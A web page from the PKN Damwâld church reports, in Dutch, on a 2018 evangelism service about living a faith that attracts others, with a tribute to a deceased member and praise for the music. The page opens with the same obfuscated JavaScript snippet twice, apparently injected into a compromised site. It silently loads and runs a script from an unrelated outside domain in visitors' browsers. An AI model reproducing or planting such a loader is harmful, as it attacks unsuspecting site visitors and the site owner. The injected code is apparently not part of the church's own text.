;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nagenieten van de evangelisatiedienst - PKN Damwâld

Nagenieten van de evangelisatiedienst

Gepubliceerd op: woensdag 21 februari 2018

Afgelopen zondagmiddag stond de evangelisatiedienst onder leiding van ds. S. Boukes in het teken van het thema ‘een aanstekelijk leven’. Aan het begin van de dienst  – georganiseerd door de evangelisatiecommissie – sprak Gerke Jilt Veenstra een indrukwekkend eerbetoon uit over Aant Wiebe Rozema, die onlangs overleed.

Evangelisatiediensten zijn in de regel in de eerste plaats bestemd voor mensen die het evangelie nog niet kennen. Of ze daar ook komen, is de vraag. De ervaring leert, dat daarvoor een belangrijke schakel nodig is: een gelovige, die hen meeneemt. Maar veel mensen vinden het moeilijk om op een goede manier voor hun geloof uit te komen. Want je kunt het geloof alleen goed overbrengen, als ons leven iets heeft, dat anderen aanlokt. Hoe doe je dat in deze tijd? Christenen zijn hoopvol door hun vertrouwen in God. In hun dagelijkse handel en wandel laten ze zien wat het betekent om volgeling van Jezus Christus te zijn. Althans, dat is het streven. Geloven in een volmaakte God betekent niet dat christenen zelf volmaakt zijn. Wel is het zo dat steeds meer christenen er ook bijvoorbeeld in hun werksituatie openlijk voor uitkomen dat ze geloven. In hun daden, en soms met woorden. Ze laten zien dat hun waarden en normen daar vaker dan je zou denken prima toepasbaar zijn, en nog relevant ook. Onze samenleving staat in toenemende mate open voor authentieke en integere mensen, heeft behoefte aan goede en aanstekelijke voorbeelden. Geen enkel probleem dus om voor je geloof uit te komen als je woorden en daden met elkaar in overeenstemming zijn. Het geloof komt daarmee terug in het publieke domein, want christen ben je 24-7. En als het goed is doortrekt het je hele leven.

The Double Brothers zorgden – naast het vertrouwde orgelspel van Jaap van der Horn – voor een heerlijk optreden. De muzikaliteit en de prachtige zangstemmen maakten hun optreden meer dan de moeite waard !